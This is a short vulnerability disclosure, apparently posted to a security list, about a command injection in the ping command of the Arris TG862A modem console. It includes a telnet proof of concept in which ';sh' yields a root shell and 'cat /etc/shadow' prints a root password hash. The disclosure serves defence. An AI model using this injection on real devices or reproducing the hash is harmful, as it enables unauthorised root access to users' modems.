Command injection in Arris modems
Inspired by Bernardo Rodrigues's publication for the NullByte Conference on his blog (http://w00tsec.blogspot.com.br/2015/11/arris-cable-modem-has-backdoor-in.html) of some command injections (backdoors?) in the restricted shell of Arris modems, I decided to publish another command injection that he may not have noticed, in the ‘ping’ feature.
Arris TG862A Command Injection
--

The Arris TG862A has a console (ARRIS Console) that, within the "System" context, has a command injection in the ping feature. The password for the ARRIS Console is the "password of the day".

Version affected
--

Hardware Model: TG862A
Firmware Name: TS0705125_062314_MODEL_862_GW
Firmware Revision: 7.5.125
Base Version: 22.214.171.124

PoC
--

```
$ telnet 192.168.100.1
Trying 192.168.100.1...
Connected to 192.168.100.1.
Escape character is '^]'.

[ARRIS ASCII-art logo banner]

ARRIS Enterprises, Inc. 2014 All rights reserved

Enter password>

Spawning ARRIS Console

Firmware Revision: 7.5.125

[ 1] Console> system
[ 2] System> ping ;sh
ping -I wan0 ;sh
BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) multi-call binary

Usage: ping [OPTIONS] HOST

BusyBox v1.15.2 (2014-06-23 08:08:11 EDT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cat /etc/shadow
root:$1$xQWhDWOr$FYNAc2DuT2Q45OY7s2R43/:10063:0:99999:7:::
#
```

Credits
--

Victor N. Ramos Mello <victornrm () gmail com>
Note: This bug is still active in the TS0705125D_031115_MODEL_862_GW firmware.